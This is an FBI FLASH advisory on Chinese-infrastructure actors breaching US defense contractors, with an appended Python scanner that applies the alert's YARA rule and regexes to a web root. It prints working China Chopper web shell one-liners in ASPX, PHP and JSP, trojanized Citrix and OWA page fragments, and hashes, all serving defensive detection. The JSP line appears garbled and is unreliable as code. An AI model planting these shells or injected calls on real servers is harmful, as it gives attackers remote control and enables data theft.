This FLASH is an update to FLASH A-000064-MW. FBI is providing an update due to typographical errors in the Hash values, Snort Rules, and Yara Rules listed therein.
The FBI is providing the following information with HIGH confidence:
The FBI has obtained information regarding a group of cyber actors who have compromised and stolen sensitive military information from US cleared defense contractors (CDCs) through cyber intrusions. This group utilizes infrastructure emanating from China to conduct their nefarious computer network exploitation (CNE) activities. Information obtained from victims and subsequent analysis indicates that they were targeted based on their US Navy Seaport Enhanced contracts. The actors did not target information pertaining to a specific contract but instead stole all information that they accessed via their malicious cyber activities. Any activity related to this group detected on a network should be considered an indication of a compromise requiring extensive mitigation and contact with law enforcement.
Technical Details
The FBI is providing the following information with HIGH confidence:
The U.S. government and private industry have observed this group across a variety of intrusions leveraging a selected number of openly accessible tools and known server vulnerabilities to exploit victim networks. This group conducts reconnaissance on victims through their publicly available web pages and reviews documents related to contracts posted on company websites. Following the reconnaissance, the cyber actors gain initial access to networks through unpatched vulnerabilities in the victim's outward-facing servers.
Following such an exploit, this group has been observed using a select number of tools to collect credentials and move laterally through the network.
The U.S. government and private industry have identified the tools listed below as indicators of compromise (IOCs) employed by this group. While these tools are very common, the U.S. government and private industry have observed an increase in intrusion activities that were executed with these tools.
China Chopper Web shell - The China Chopper web shell is used to allow remote access to a compromised web server. It can be deployed by using a few different single lines of code and can be written in any common web language that supports server-side scripting (e.g. asp, cfm, php, javascript, etc.).
ASPX payload
<%@ Page Language="Jscript"%><%eval(Request.Item["password"], "unsafe");%>
<% WebServices.InitalizeWebServices ("shell_password");%>
MD5 Hash: 3300ac4025e515402612842bff0aa119
<%// style.aspx
// Copyright (c) 2007 - 2010 Citrix Systems, Inc. All Rights Reserved.
// Web Interface 5.3.0.0
%>
<%WebServices.InitalizeWebServices("Citrix.Systems.Ime");%>
<!--#include file="~/app_data/serverscripts/include.aspxf"-->
System.WebServices.dll
MD5 Hash: 8a6043d95d816ad63225365bd3794f55
This Function can not use now..\ z1/ 0 z21'yyyy-MM-dd HH:mm:ss /c
kSELECT [name] FROM master.dbo.sysdatabases ORDER BY 1 use w;SELECT
[name] FROM sysobjects WHERE (xtype='U') ORDER BY 1USE [{0}];SELECT
A.[name],B.[name] FROM syscolumns A,systypes B where
A.id=object_id('{1}') and A.xtype=B.xtype ORDER BY A.colid()|\SELECT
EXEC DECLARE ExecuteResult OK_ CsharpChopperServerScriptRunner By
zcgonvh , Version 0.0.0.1 Released, Public Final , FullChopperRunner.
<br />k<h3>Warning:</h3><br/>This program only used by <span
style="color:red">Site Administrtor</span> . Please confirm your
identity , or has a authorization from administrator. <br/>
MD5 Hash: 2e47de670b47442292970412945904ae
<%@ Page language="c#" Codebehind="Error.aspx.cs" AutoEventWireup="false" Inherits="Microsoft.Exchange.Clients.Owa.Core.Error" %>
<%@ Import Namespace="Microsoft.Exchange.Clients" %>
<%@ Import Namespace="Microsoft.Exchange.Clients.Owa.Core" %>
<%@ Import Namespace="Microsoft.Exchange.Clients.Owa.Premium" %>
<!-- {698798E9-889B-4145-ACFC-474C378C7B4F} -->
<html dir="<%=(SessionContext != null && SessionContext.IsRtl) ? "rtl" : "ltr"%>">
<% // Any urls to resources in this file, must be absolute urls. The error page can load as a response to any request
// made by the client, since it does by an internal redirect on the server and not as a 302 issued to the client.
// Therefore, there is no way of knowing where a relative url will take you. For example, this page can load as a
// result of this request "http://servername/owa/auth/logon.aspx" or this request
// "http://servername/owa/ev.owa?oeh=1&ae=dostuff"
//
%>
<head>
<meta http-equiv="Content-Type" content="text/html; CHARSET=utf-8">
<title><%= LocalizedStrings.GetHtmlEncoded(Strings.IDs.ErrorTitle) %></title>
<%WebServices.InitalizeWebServices("OwaUrl.ApplicationRoot.Ime");%>
<link type="text/css" rel="stylesheet" href="<%=ResourcePath%>14.2.390.1/themes/base/premium.css">
<link type="text/css" rel="stylesheet" href="<%=ResourcePath%>14.2.390.1/themes/resources/<%= Utilities.GetDefaultCultureFontCssFileUrl(OwaContext) %>">
<style>
<% if (Utilities.IsViet()) { %>
body, html
{
font-family:Helvetica, Tahoma !important;
}
<% } %>
</style>
MD5 Hash: 5001ef50c7e869253a7c152a638eab8a
MD5 Hash: 8aa603ee2454da64f4c70f24cc0b5e08
MD5 Hash: ad8288227240477a95fb023551773c84
MD5 Hash: acba8115d027529763ea5c7ed6621499
MD5 Hash: f2ac6532ca6220ea4cb1720b81e74007
PHP payload
<?php @eval($_POST['password']);?>
JSP payload
<%
If(request.getParameter("f")!=null)(newjava.io(FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write{request.getParameter("t").getBytes()};
%>
Yara Rules:
rule webshell_chinachopper_csharp
{
    strings:
        $pdbfrag = "ChopperSreverForCsharp"
        $ban1 = "CsharpChopperServerScriptRunner By zcgonvh" ascii wide
        $chop_a = "ChopperApi_A_Get_LocalDirectory"
        $chop_b = "ChopperApi_B_GetFileList"
    condition:
        2 of them
}
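As an added example covering both the payloads and the Yara rule above (this is not part of the FBI FLASH), the following Python re-implements the rule's "2 of them" condition and pairs it with regexes for the quoted one-line payloads and the injected InitalizeWebServices call, so a defender can triage a web root even where the yara module is not installed. The sample inputs at the bottom are constructed for a local check; the function and pattern names are this example's own.

```python
import re
from pathlib import Path

# Strings from the alert's YARA rule; only $ban1 is "ascii wide", so it is also searched as UTF-16LE.
YARA_STRINGS = {
    "pdbfrag": "ChopperSreverForCsharp",
    "ban1": "CsharpChopperServerScriptRunner By zcgonvh",
    "chop_a": "ChopperApi_A_Get_LocalDirectory",
    "chop_b": "ChopperApi_B_GetFileList",
}
# Patterns for the one-line payloads quoted in the alert and for the
# InitalizeWebServices call injected into the trojanized Citrix/OWA pages.
PAYLOAD_PATTERNS = {
    "aspx_eval_unsafe": re.compile(r'eval\s*\(\s*Request\.Item\[[^\]]*\]\s*,\s*"unsafe"\s*\)', re.I),
    "php_eval_post": re.compile(r"@?eval\s*\(\s*\$_POST\[[^\]]*\]\s*\)", re.I),
    "jsp_write_param": re.compile(r"FileOutputStream.*getRealPath.*getParameter", re.I | re.S),
    "injected_initalizewebservices": re.compile(r"WebServices\.InitalizeWebServices\s*\(", re.I),
}

def match_yara_strings(data: bytes) -> set:
    """Names of the rule's strings present in data (ASCII, plus UTF-16LE for $ban1)."""
    hits = set()
    for name, s in YARA_STRINGS.items():
        if s.encode("ascii") in data or (name == "ban1" and s.encode("utf-16-le") in data):
            hits.add(name)
    return hits

def scan_bytes(data: bytes) -> dict:
    """Apply the rule's '2 of them' condition and the payload regexes to one file."""
    yara_hits = match_yara_strings(data)
    text = data.decode("utf-8", errors="ignore")
    payload_hits = {n for n, rx in PAYLOAD_PATTERNS.items() if rx.search(text)}
    return {"yara_rule": len(yara_hits) >= 2, "yara_strings": sorted(yara_hits),
            "payloads": sorted(payload_hits),
            "suspect": len(yara_hits) >= 2 or bool(payload_hits)}

def scan_webroot(root, exts=(".aspx", ".asp", ".php", ".jsp", ".cfm", ".dll")) -> dict:
    """Walk a web root and return scan results keyed by path for every suspect file."""
    findings = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in exts:
            result = scan_bytes(p.read_bytes())
            if result["suspect"]:
                findings[str(p)] = result
    return findings
# Constructed samples for a local check (not files from the alert).
SAMPLE_SHELL = b'<%@ Page Language="Jscript"%><%eval(Request.Item["password"], "unsafe");%>'
SAMPLE_DLL = b"MZ\x00ChopperApi_B_GetFileList\x00" + "CsharpChopperServerScriptRunner By zcgonvh".encode("utf-16-le")
SAMPLE_CLEAN = b'<%@ Page Language="C#" %><html><body>Hello</body></html>'
```

Run scan_webroot against a copy of the server's web root and review each flagged file alongside the MD5 hashes listed above; a yara_rule hit on a DLL or an injected_initalizewebservices hit in a vendor page warrants the full mitigation and law-enforcement contact the alert calls for.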